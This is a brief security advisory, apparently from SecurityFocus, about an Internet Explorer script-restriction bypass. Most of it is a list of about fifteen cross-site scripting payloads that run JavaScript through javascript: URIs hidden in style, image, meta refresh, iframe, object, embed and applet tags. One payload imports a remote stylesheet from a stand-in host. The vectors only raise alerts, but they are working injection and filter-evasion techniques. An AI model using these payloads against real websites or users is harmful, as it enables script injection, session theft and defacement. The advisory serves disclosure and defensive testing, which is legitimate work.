source: https://www.securityfocus.com/bid/35455/info

Microsoft Internet Explorer is prone to a security-bypass vulnerability because it fails to properly enforce restrictions on script behavior.

An attacker may exploit this issue to bypass restrictions on the execution of JavaScript code. This may aid in further attacks. 

<STYLE>@import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://example.com/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html>